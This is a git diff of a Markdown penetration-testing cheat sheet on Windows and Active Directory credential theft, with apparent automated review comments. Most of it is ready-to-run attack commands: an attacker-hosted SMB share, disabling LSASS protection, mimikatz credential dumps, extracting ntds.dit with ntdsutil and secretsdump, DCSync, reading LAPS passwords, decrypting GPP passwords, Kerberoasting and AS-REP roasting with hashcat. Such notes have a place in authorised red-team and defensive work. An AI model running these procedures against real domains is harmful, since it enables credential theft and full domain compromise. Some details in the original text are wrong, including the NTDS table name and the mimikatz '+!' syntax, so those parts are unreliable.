Stefan Friese 2022-09-03 16:24:01 +02:00
parent 9a18fefd36
commit cb7800d75c
2 changed files with 124 additions and 4 deletions

@ -1,6 +1,7 @@
# Connect to Attacker SMB
## Attacker
* Impacket smbserver on attacker
```sh
sudo examples/smbserver.py share . -smb2support -username <user> -password <password>
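Review bot: the smbserver.py line shares whatever directory it is launched from (`.`) and the text does not say so; add a sentence telling the reader to start it from a dedicated, empty directory so nothing else on the attacker host ends up on the share. It is also worth stating why `-smb2support` is there: current Windows clients ship with SMB1 disabled, so without it they cannot connect at all.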

@ -65,12 +65,22 @@ reg query HKCU /f password /t REG_SZ /s
### AD Credentials
* Check AD's NTDS, SYSVOL
* Check user description of AD users
* Check AD's NTDS (configuration database), SYSVOL (policy distribution through the domain)
```sh
Get-ADUser -Filter * -Properties * | select Name,SamAccountName,Description
```
#### NTDS
* Check user description of AD users
* NTDS consists of three tables
* Schema
* Link
* Data type
* Located under `C:\Windows\NTDS`
* File is locked by AD at runtime
* A System Bootkey is need to dump the NTDS
## Exploit
* __Use found credentials__
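Review bot: "Data type" in the new NTDS list is not one of the three tables; ntds.dit consists of the schema table, the link table and the data table (the data table is the one that holds the objects and their attributes), so the third bullet should read "Data table". In the same hunk, "A System Bootkey is need" should be "is needed", and one clause explaining why would help: the hashes in ntds.dit are encrypted with the Password Encryption Key, which is in turn encrypted with the boot key held in the SYSTEM hive, which is why SYSTEM is collected next to ntds.dit later in the file. Two smaller points: the bullet "Check user description of AD users" now sits under "#### NTDS" although it belongs to the general enumeration list above, and `Get-ADUser -Filter * -Properties *` pulls every attribute of every user from the DC; `-Properties Description` returns what the `select` needs.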
@ -104,6 +114,7 @@ runas /savecred /user:<domain\user> reverse_shell.exe
### accesschk64 Permissions
* Check access to files and folders
```sh
accesschk64 -wvu "file.exe"
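Review bot: the new line "Check access to files and folders" should say what the switches do, since the command is otherwise opaque: `-w` lists only objects the account can write to, `-v` prints the effective rights, `-u` suppresses errors. Also worth adding `-accepteula`; on a host where the tool has not run before, the first invocation stops at the interactive EULA dialog, which hangs a non-interactive shell.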
@ -298,6 +309,7 @@ copy cmd.exe utilman.exe
* Log out, on the Login screen click on `Ease of Access`
#### SeImpersonate / SeAssignPrimaryToken
* It is a rouge potato
* Execute process as another user
* Service accounts operate through impersonation
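Review bot: "It is a rouge potato" is both misspelled (the tool is RoguePotato, "rogue") and a fragment that does not say what the tool does; make it read along the lines of "RoguePotato abuses this privilege to obtain a SYSTEM token". The following bullet "Execute process as another user" should also say that the privilege only allows impersonating a client that has authenticated to the process, which is exactly why it is granted to service accounts and why those accounts are the high-value targets here.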
@ -335,16 +347,19 @@ sekurlsa::logonpasswords
### LSASS Protection
* If the dump cannot be created because it is protected change `RunAsPPL` DWORD to `1` under
__The bypass is needed most of the time in order to dump passwords__
* If the dump cannot be created because it is protected change `RunAsPPL` DWORD to `0` under
```sh
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
```
* Alternatively use mimikatz
* Alternatively, use mimikatz
```sh
privilege::debug
!+
!processprotect /process:lsass.exe /remove
```
* `+!` calls `mimidrv.sys`, __therefore mimikatz has to be executed inside the same directory the this file lies__
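Review bot: changing `RunAsPPL` to `0` does not unprotect an already running LSASS; the PPL flag is applied when LSASS starts, so the edit only takes effect after a reboot, and on hosts where the setting is enforced through the UEFI variable (Secure Boot) the registry change alone is not sufficient. State that next to the bullet, otherwise the mimikatz alternative reads as interchangeable when it is the only route without a reboot. In the last bullet, `+!` should be `!+` to match the command block above, and "the this file lies" should read "in which this file lies". From the detection side, the bullet presents `!+` purely as a file-placement concern; it installs `mimidrv.sys` as a kernel service, which leaves a System log 7045 event (new service installed) and a driver load event (Sysmon event 6 where deployed), both of which EDR products key on.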
### Windows Credential Manager
@ -367,3 +382,107 @@ Get-WebCredentials
privilege::debug
sekurlsa::credman
```
### Ntdsutil
* If administrative permissions on the DC have been gained this can be done
* Used to maintain the AD database, delete objects, snapshotting, set Directory Service Restore Mode (DSRM)
#### Locally extracting ntds.dit
* This can be done to gather the system boot key
* No AD credentials are needed
* Three files are needed
* C:\Windows\NTDS\ntds.dit
* C:\Windows\System32\config\SYSTEM
* C:\Windows\System32\config\SECURITY
* Locally dumping all three needed file is done via
```sh
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\Windows\Temp\ntds' q q"
```
* Use `secretsdump` to extract `ntds.dit`
```sh
secretsdump.py -security ./SECURITY -system ./SYSTEM -ntds ./ntds.dit local
```
#### Remotely dumping ntds
* Needs the following AD credentials
* Replicating Directory Changes
* Replicating Directory Changes All
* Replicating Directory Changes in Filtered Set
* Mimikatz or impacket can be used to gain credentials
* Impacket's secretsdump.py via
```sh
secretsdump.py -just-dc <domain>/<AD_Admin_User>@$DC_IP
secretsdump.py -just-dc-ntlm <domain>/<AD_Admin_User>@$DC_IP
```
### Local Administration Password Solution (LAPS)
* This is possible if the user which credentials we posses is member of the group to make password changes
* Replaces GPP, see below
* There are two interesting attributes
* __ms-mcs-AdmPwd__ contains plain text password of the local Administrator
* __ms-mcs-AdmPwdExpirationTime__ contains the expiration date of the admin password
* __admpwd.dll__ is used to update the password inside __ms-mcs-AdmPwd__
* If LAPS is enabled the dll can be found in `C:\Program Files\LAPS\CSE`
* List the cmdlets for LAPS
```sh
Get-Command *AdmPwd*
```
* Find the Organisational Unit with extended rights and take a look at the group under `ExtendedRightsHolder` in the output
```sh
Find-AdmPwdExtendedRights -Identity <OU>
```
* Enumerate which hosts have LAPS enabled
* Impersonate the user and execute the following which displays the password
```sh
Get-AdmPwdPassword -ComputerName <targethost>
```
* Use the property name displayed under `ExtendedRightsHolder` to enumerate groups and their users
```sh
net groups <ExtendedRightsHolder>
net user <GroupMemberUsername>
```
#### Group Policy Preferences
* Provisions administrational groups through the domain via SYSVOL
* Distribution is done through XML files on SYSVOL. These contain a password encrypted with [the published private key](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN)
* Use [Powersploit's Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1) to decrypt it
### Kerberoasting
* Inital (low level) credentials are needed
* __Service Principal Name (SPN)__ account must be known, e.g. from web IIS user or SQL users
```sh
GetUserSPNs.py -dc-ip $DC_IP <domain>/<user>
```
* Take a look at `Name` in the output and use it to query a TGS ticket
```sh
GetUserSPNs.py -dc-ip $DC_IP <domain>/<user> -request-user <SPN>
```
* Crack the kerberos hash
```sh
hashcat -m 13100 -a0 hash.txt --wordlist <wordlist>
```
### AS-REP Roasting
* `Do not require Kerberos pre-authentication` must be set on the AD user's account login settings. A password is used instead
* A list of potential users with this configured setting should be gathered
```sh
GetNPUsers.py -dc-ip $DC_IP <domain>/ -usersfile users.txt
```